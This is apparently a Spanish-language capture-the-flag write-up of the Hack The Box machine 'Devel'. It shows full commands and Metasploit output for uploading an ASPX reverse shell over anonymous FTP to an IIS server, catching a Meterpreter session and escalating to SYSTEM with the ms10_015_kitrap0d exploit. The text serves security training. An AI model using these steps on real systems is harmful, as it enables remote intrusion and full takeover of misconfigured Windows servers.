La máquina Devel es un desafío de nivel introductorio orientado a demostrar los riesgos de configuraciones por defecto en sistemas Windows. A través de una fase de reconocimiento básica, se identifican dos vectores principales: un servidor FTP de Microsoft y un servidor web IIS corriendo en el mismo equipo. El acceso anónimo habilitado en el FTP, junto con permisos de escritura en el directorio público del servidor web, permiten al atacante cargar archivos ejecutables, lo que se convierte en el punto de entrada clave para la explotación remota.
Mediante la carga de una reverse shell en formato ASPX, se establece una sesión Meterpreter que permite la ejecución remota de comandos. Una vez dentro del sistema, el objetivo pasa a ser la escalada de privilegios. Debido a que la máquina está basada en una arquitectura de 32 bits, se aprovechan módulos locales de Metasploit, en particular el exploit ms10_015_kitrap0d, que resulta exitoso para elevar los privilegios hasta el nivel de administrador.
Este reto pone en evidencia la importancia de la correcta configuración de servicios expuestos a la red, así como también destaca el valor de herramientas automatizadas para la explotación y post-explotación en entornos Windows.
-sC → Ejecuta scripts de detección predeterminados → Usa los scripts de nmap ubicados en /usr/share/nmap/scripts/, los cuales buscan información adicional en los puertos abiertos.
-sV → Detección de versiones → Intenta identificar el software y su versión en los puertos abiertos.
-n → No resuelve nombres de dominio (reduce el tiempo del escaneo).
--open → Muestra solo puertos abiertos → Filtra la salida para no mostrar puertos cerrados o filtrados.
-T4 → Ajusta la velocidad del escaneo → T4 es un nivel "agresivo" que acelera el escaneo, útil en redes rápidas.
-v → Modo verbose → Muestra más detalles sobre el progreso del escaneo.
Resultado:
PORT STATE SERVICE VERSION21/tcp open ftp Microsoft ftpd| ftp-anon: Anonymous FTP login allowed (FTP code 230)| 03-18-1702:06AM <DIR> aspnet_client| 04-30-2506:46AM 2943 exp.aspx| 03-17-1705:37PM 689 iisstart.htm|_03-17-1705:37PM 184946 welcome.png| ftp-syst: |_ SYST: Windows_NT80/tcp open http Microsoft IIS httpd 7.5|_http-server-header: Microsoft-IIS/7.5| http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST|_ Potentially risky methods: TRACE|_http-title: IIS7Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
De entrada vemos que nmap pudo acceder como usuario anonymous al puerto 21 (ftp) y listar los recursos que se alojan allí. Y además, el puerto 80 corre un Microsoft-IIS/7.5
Enumeración de archivos y permisos vía FTP
Entonces, lo primero que vamos a hacer es enumerar los recursos y permisos del ftp con la tool ftpmap.py
De todos estos recursos que enumero el ftpmap el que nos interesa es el exp.aspx, porque se trata de un archivo ejecutable por IIS (osea codigo ASP.NET) y nos está indicando que podemos subir un ejecutable con esa extensión para levantar una reverse shell. El siguiente paso es setear y crear nuestro payload con msfvenom para obtener nuestra reverse shell
Abuso de configuración débil
Subimos el payload al servidor ftp. Para que el payload se cargue efectivamente tenemos que conectarnos al servidor ftp desde el directorio donde este se encuentra.
Ejecución remota de comandos (RCE)
Una vez que subimos el payload solo tenemos que levantar el listener en msfconsole y ejecutar el payload desde la url del servidor web (http://10.10.10.5/backdoor.aspx)
Post-explotación y reconocimiento interno
Para la escalada de privilegios seleccionaremos el módulo post/multi/recon/local_exploit_suggester que se encarga de buscar aquellos exploits que puedan ser útiles para esta sesión dentro de la base de datos de msfconsole.
Escalada de privilegios local
El exploit que nos servirá para este caso es el exploit/windows/local/ms10_015_kitrap0d y lo único que debemos setear es el lhost y la sesión de meterpreter donde tenemos la reverse shell activa.
┌──(root㉿kali)-[/home/kali/Documents/HTB/DEVEL]
└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=4444 -f aspx -o backdoor.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of aspx file: 2902 bytes
Saved as: backdoor.aspx
ftp> put backdoor.aspx
local: backdoor.aspx remote: backdoor.aspx
229 Entering Extended Passive Mode (|||49201|)
125 Data connection already open; Transfer starting.
100% |**********************************************************| 2942 3.40 MiB/s --:-- ETA
226 Transfer complete.
2942 bytes sent in 00:00 (12.39 KiB/s)
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set lhost 10.10.14.7
lhost => 10.10.14.7
msf6 exploit(multi/handler) > options
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process,
none)
LHOST 10.10.14.7 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.7:4444
[*] Sending stage (177734 bytes) to 10.10.10.5
[*] Meterpreter session 11 opened (10.10.14.7:4444 -> 10.10.10.5:49217) at 2025-05-02 01:50:36 -0400
meterpreter >
meterpreter > background
[*] Backgrounding session 11...
msf6 exploit(multi/handler) > search suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester . normal No Multi Recon Local Exploit Suggester
Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > show options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the avai
lable exploits
msf6 post(multi/recon/local_exploit_suggester) > set session 11
session => 11
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.5 - Collecting local exploits for x86/windows...
/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/logging-2.4.0/lib/logging.rb:10: warning: /usr/lib/x86_64-linux-gnu/ruby/3.3.0/syslog.so was loaded from the standard library, but will no longer be part of the default gems starting from Ruby 3.4.0.
You can add syslog to your Gemfile or gemspec to silence this warning.
Also please contact the author of logging-2.4.0 to request adding syslog into its gemspec.
[*] 10.10.10.5 - 204 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_comhijack: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Running check method for exploit 42 / 42
[*] 10.10.10.5 - Valid modules for session 11:
=============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/bypassuac_comhijack Yes The target appears to be vulnerable.
2 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable.
3 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move Yes The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
4 exploit/windows/local/ms10_015_kitrap0d Yes The service is running, but could not be validated.
5 exploit/windows/local/ms10_092_schelevator Yes The service is running, but could not be validated.
6 exploit/windows/local/ms13_053_schlamperei Yes The target appears to be vulnerable.
7 exploit/windows/local/ms13_081_track_popup_menu Yes The target appears to be vulnerable.
8 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable.
9 exploit/windows/local/ms15_004_tswbproxy Yes The service is running, but could not be validated.
10 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable.
11 exploit/windows/local/ms16_016_webdav Yes The service is running, but could not be validated.
12 exploit/windows/local/ms16_032_secondary_logon_handle_privesc Yes The service is running, but could not be validated.
13 exploit/windows/local/ms16_075_reflection Yes The target appears to be vulnerable.
14 exploit/windows/local/ms16_075_reflection_juicy Yes The target appears to be vulnerable.
15 exploit/windows/local/ntusermndragover Yes The target appears to be vulnerable.
16 exploit/windows/local/ppr_flatten_rec Yes The target appears to be vulnerable.
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_015_kitrap0d
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms10_015_kitrap0d) > set lhost 10.10.14.7
lhost => 10.10.14.7
msf6 exploit(windows/local/ms10_015_kitrap0d) > set session 11
session => 11
msf6 exploit(windows/local/ms10_015_kitrap0d) > run
[*] Started reverse TCP handler on 10.10.14.7:4444
[*] Reflectively injecting payload and triggering the bug...
[*] Launching msiexec to host the DLL...
[+] Process 2788 launched.
[*] Reflectively injecting the DLL into 2788...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (177734 bytes) to 10.10.10.5
[*] Meterpreter session 12 opened (10.10.14.7:4444 -> 10.10.10.5:49218) at 2025-05-02 02:01:23 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 2080 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>type \Users\babis\Desktop\user.txt
type \Users\babis\Desktop\user.txt
7f47****************************
c:\windows\system32\inetsrv>type \Users\Administrator\Desktop\root.txt
type \Users\Administrator\Desktop\root.txt
7cb3****************************
